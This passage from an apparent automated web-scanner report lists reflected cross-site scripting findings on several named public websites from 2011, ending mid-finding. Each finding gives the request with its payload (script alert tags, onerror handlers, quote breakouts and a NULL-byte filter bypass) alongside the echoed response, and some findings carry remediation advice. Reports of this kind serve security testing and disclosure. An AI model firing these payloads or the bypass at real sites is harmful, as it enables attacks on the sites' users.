...[SNIP]...

5.333. https://www.newsvine.com/_nv/accounts/login [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/login

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aede4"><script>alert(1)</script>23d43ff5841 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /_nv/accounts/login?aede4"><script>alert(1)</script>23d43ff5841=1 HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:21:17 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=737406501fadd3f45b7f4acf77a8cd72; expires=Sat, 25-Jan-2031 03:21:17 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 10151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<input type="hidden" name="redirect" value="/_nv/accounts/login?aede4"><script>alert(1)</script>23d43ff5841=1" />
...[SNIP]...

5.334. http://www.polls.newsvine.com/_vine/printer [path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_vine/printer

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload 35aee<img%20src%3da%20onerror%3dalert(1)>16f5f70bd5e was submitted in the path parameter. This input was echoed as 35aee<img src=a onerror=alert(1)>16f5f70bd5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=www&path=/_vine/3c3db971ca91afcd)(sn=*/pierre35aee<img%20src%3da%20onerror%3dalert(1)>16f5f70bd5e HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://www.polls.newsvine.com/_vine/3c3db971ca91afcd)(sn=*/pierre
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:35:29 GMT
Connection: close
Content-Length: 523

{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.polls.newsvine.com
...[SNIP]...
1,"domainName":null,"displayName":null},"devMachine":false,"section":{"type":"w","contentSetId":"38","domainName":"www","displayName":"www","avatar":null,"path":"\/_vine\/3c3db971ca91afcd)(sn=*\/pierre35aee<img src=a onerror=alert(1)>16f5f70bd5e"},"revision":"23247"}

5.335. http://www.reimage.com/includes/router_land.php [banner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reimage.com
Path:   /includes/router_land.php

Issue detail

The value of the banner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e51e9"><script>alert(1)</script>cee4b8a47b8 was submitted in the banner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /includes/router_land.php?tracking=Neudesic&banner=728x90-1\e51e9"><script>alert(1)</script>cee4b8a47b8 HTTP/1.1
Host: www.reimage.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:06 GMT
Server:
Set-Cookie: PHPSESSID=b2q9u49ulbje66brdqd512dqf4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _language=english; expires=Wed, 30-Mar-2011 23:29:06 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11300

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="description" content="Reimage specializes in 100% Windows OS repair.">
<link href="cs
...[SNIP]...
<img src="/track_new/track.php?tracking=Neudesic&campaign=728x90-1\e51e9"><script>alert(1)</script>cee4b8a47b8&adgroup=direct&ads_name=direct&keyword=direct" width="1" height="1" />
...[SNIP]...

5.336. http://www.reimage.com/includes/router_land.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reimage.com
Path:   /includes/router_land.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ef54"><script>alert(1)</script>298f8ddc1b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /includes/router_land.php?tracking=Neudesic&banner=728x9/4ef54"><script>alert(1)</script>298f8ddc1b00-1\ HTTP/1.1
Host: www.reimage.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:08 GMT
Server:
Set-Cookie: PHPSESSID=a8u9t37rrk5v7gi6k9c56rhjg2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _language=english; expires=Wed, 30-Mar-2011 23:29:08 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11301

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="description" content="Reimage specializes in 100% Windows OS repair.">
<link href="cs
...[SNIP]...
<img src="/track_new/track.php?tracking=Neudesic&campaign=728x9/4ef54"><script>alert(1)</script>298f8ddc1b00-1\&adgroup=direct&ads_name=direct&keyword=direct" width="1" height="1" />
...[SNIP]...

5.337. http://www.reimage.com/includes/router_land.php [tracking parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reimage.com
Path:   /includes/router_land.php

Issue detail

The value of the tracking request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69f18"><script>alert(1)</script>602f708c63d was submitted in the tracking parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /includes/router_land.php?tracking=Neudesic69f18"><script>alert(1)</script>602f708c63d&banner=728x90-1\ HTTP/1.1
Host: www.reimage.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:05 GMT
Server:
Set-Cookie: PHPSESSID=c3crq8h6ge3n955pop0jkt83l2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _language=english; expires=Wed, 30-Mar-2011 23:29:05 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11300

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="description" content="Reimage specializes in 100% Windows OS repair.">
<link href="cs
...[SNIP]...
<img src="/track_new/track.php?tracking=Neudesic69f18"><script>alert(1)</script>602f708c63d&campaign=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct" width="1" height="1" />
...[SNIP]...

5.338. http://www.scientificamerican.com/blog/observations/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.scientificamerican.com
Path:   /blog/observations/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9edcb"><a>429173c9aec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blog/observations/?9edcb"><a>429173c9aec=1 HTTP/1.1
Host: www.scientificamerican.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: CFID=155211566;expires=Tue, 22-Jan-2041 03:19:05 GMT;path=/
Set-Cookie: CFTOKEN=70876219;expires=Tue, 22-Jan-2041 03:19:05 GMT;path=/
Set-Cookie: SSCIAMUSER=;path=/
Set-Cookie: CFID=155211566;path=/
Set-Cookie: CFTOKEN=70876219;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D2%23cftoken%3D70876219%23cfid%3D155211566%23;expires=Tue, 22-Jan-2041 03:19:05 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 70062
Date: Sun, 30 Jan 2011 03:19:05 GMT
X-Varnish: 1915411487
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
   <!--[if IE]><![endif]-->
   <title>Observations: Scientific American Blogs</title>
   <meta charset="utf-8" />
   <meta name="description" content="" />
   <met
...[SNIP]...
<input type="hidden" name="url" value="http://www.scientificamerican.com/blog/observations/index.cfm?9edcb"><a>429173c9aec=1" />
...[SNIP]...

5.339. http://www.scout.com/a.z [blipid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The value of the blipid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 38e68(a)38972b8eede was submitted in the blipid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a.z?s=143&p=3&blipid=1456838e68(a)38972b8eede HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; __utmc=202704078; __utmb=202704078.3.9.1296350699791

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sun, 30 Jan 2011 01:27:20 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 01:37:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.186 in 14 ms
Vary: Accept-Encoding
Content-Length: 2434


<!--
ERROR in function:    "Page_Init()"
- Local date/time :    Saturday, January 29, 2011 5:27:20 PM
- Source :        System.Data
- Message :        Failed to convert parameter value from a String to a Int32.
- message :        undefined
- Number :        0
- Description :        undefined
- description :        undefined
- URL:        s=143&p=3&blipid=1456838e68(a)38972b8eede
- Remote IP :        192.168.10.129
- Referrer URL :        
- Server IP:        192.168.20.77, SPRUCE
- MachineName:        SPRUCE
- Stack Trace:
at System.Data.SqlClient.SqlParameter.CoerceValue(Object v
...[SNIP]...

5.340. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The value of the EdpNo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003cb51"><a>6308be81e2 was submitted in the EdpNo parameter. This input was echoed as 3cb51"><a>6308be81e2 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /applications/SearchTools/item-details.asp?EdpNo=6532393%003cb51"><a>6308be81e2 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA05A
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 02:04:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=51; path=/
Set-Cookie: SRVR=WEBX12%2D05A; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393%25003cb51%22%3E%3Ca%3E6308be81e2&Referer=; path=/
Set-Cookie: SessionId=3041425620110129210416173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com
Content-Length: 177793

<!--V2-->
<!-- Your IP is:192.204.11.208-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, n
...[SNIP]...
<input type="hidden" name="url" value="http://www.tigerdirect.com/applications/SearchTools/item-details.asp?page=ty&EdpNo=6532393%003cb51"><a>6308be81e2">
...[SNIP]...

5.341. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The value of the EdpNo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ac78'%3balert(1)//e5661d759a9 was submitted in the EdpNo parameter. This input was echoed as 2ac78';alert(1)//e5661d759a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /applications/SearchTools/item-details.asp?EdpNo=65323932ac78'%3balert(1)//e5661d759a9 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA04B
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Sun, 01 Aug 2010 19:31:44 GMT
Pragma: no-cache
RTSS: 1
Date: Sun, 30 Jan 2011 17:48:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.tigerdirect.com
Set-Cookie: SSID=AwD7lykAAAAAbqRFTRovCwJupEVNAQBupEVNAAAAAAAAAABupEVNAQCWBwAAWnMAAAI; path=/; domain=.tigerdirect.com; expires=Mon, 30-Jan-2012 17:48:30 GMT
Set-Cookie: SSSC=91.G5568037306701131546.1.1942.29530; path=/; domain=.tigerdirect.com
Set-Cookie: SSRT=bqRFTQA; path=/; domain=.tigerdirect.com; expires=Mon, 30-Jan-2012 17:48:30 GMT
Set-Cookie: pop%5Fcheck=active; expires=Tue, 01-Mar-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Mon, 31-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&ItemDetailsBeta=Y&msProduct=1782427&msRandX=70; path=/
Set-Cookie: SRVR=WEBX11%2D04B; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D65323932ac78%27%253balert%281%29%2F%2Fe5661d759a9&Referer=; path=/
Set-Cookie: SessionId=3967579620110130124831173193214243; expires=Mon, 30-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Tue, 01-Mar-2011 05:00:00 GMT; path=/
Content-Length: 100872

<!--V2-->
<!-- Your IP is:70.42.51.10-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, newH
...[SNIP]...
</a>');
}

function ReviewSort(robj)
{
this.location ='/applications/searchtools/item-details.asp?EdpNo=' +'65323932ac78';alert(1)//e5661d759a9'+ '&RSort=' +robj.value+ '&csid=ITD&body=#ReviewStart'
}

//The following 2 functions have to do with the In-store Avail popup div - case 61721
document.onclick = checkClickedElement;
function c
...[SNIP]...

5.342. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The value of the EdpNo request parameter is copied into an HTML comment. The payload %0010a05--><a>cede825acff was submitted in the EdpNo parameter. This input was echoed as 10a05--><a>cede825acff in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /applications/SearchTools/item-details.asp?EdpNo=6532393%0010a05--><a>cede825acff HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA04B
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 02:04:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150A%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150A%2Ejpg&ItemDetailsBeta=Y&msProduct=335878&msRandX=19; path=/
Set-Cookie: SRVR=WEBX11%2D04B; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393%250010a05%2D%2D%3E%3Ca%3Ecede825acff&Referer=; path=/
Set-Cookie: SessionId=1384513520110129210427173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com
Content-Length: 177796

<!--V2-->
<!-- Your IP is:192.204.11.202-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, n
...[SNIP]...
<!--Cart(Landing) :http://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393%0010a05--><a>cede825acff-->
...[SNIP]...

5.343. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The value of the EdpNo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 796d4'%3balert(1)//5a2dd2f7153 was submitted in the EdpNo parameter. This input was echoed as 796d4';alert(1)//5a2dd2f7153 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /applications/SearchTools/item-details.asp?EdpNo=6532393796d4'%3balert(1)//5a2dd2f7153 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01B
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 02:04:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150A%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150A%2Ejpg&ItemDetailsBeta=Y&msProduct=335878&msRandX=11; path=/
Set-Cookie: SRVR=WEBX10%2D01B; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393796d4%27%253balert%281%29%2F%2F5a2dd2f7153&Referer=; path=/
Set-Cookie: SessionId=959419320110129210424173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com
Content-Length: 100869

<!--V2-->
<!-- Your IP is:192.204.11.202-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, n
...[SNIP]...
</a>');
}

function ReviewSort(robj)
{
this.location ='/applications/searchtools/item-details.asp?EdpNo=' +'6532393796d4';alert(1)//5a2dd2f7153'+ '&RSort=' +robj.value+ '&csid=ITD&body=#ReviewStart'
}

//The following 2 functions have to do with the In-store Avail popup div - case 61721
document.onclick = checkClickedElement;
function c
...[SNIP]...

5.344. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload %00bb0c0--><a>d595b8102fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb0c0--><a>d595b8102fc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /applications/SearchTools/item-details.asp?%00bb0c0--><a>d595b8102fc=1 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Length: 100803
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 01:24:24 GMT
Connection: close
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&ItemDetailsBeta=Y&msProduct=1782427&msRandX=83; path=/
Set-Cookie: SRVR=WEBX10%2D08A; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3F%2500bb0c0%2D%2D%3E%3Ca%3Ed595b8102fc%3D1&Referer=; path=/
Set-Cookie: SessionId=4668577920110129202424173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com

<!--V2-->
<!-- Your IP is:96.17.168.193-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, ne
...[SNIP]...
<!--Cart(Landing) :http://www.tigerdirect.com/applications/SearchTools/item-details.asp?%00bb0c0--><a>d595b8102fc=1-->
...[SNIP]...

5.345. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
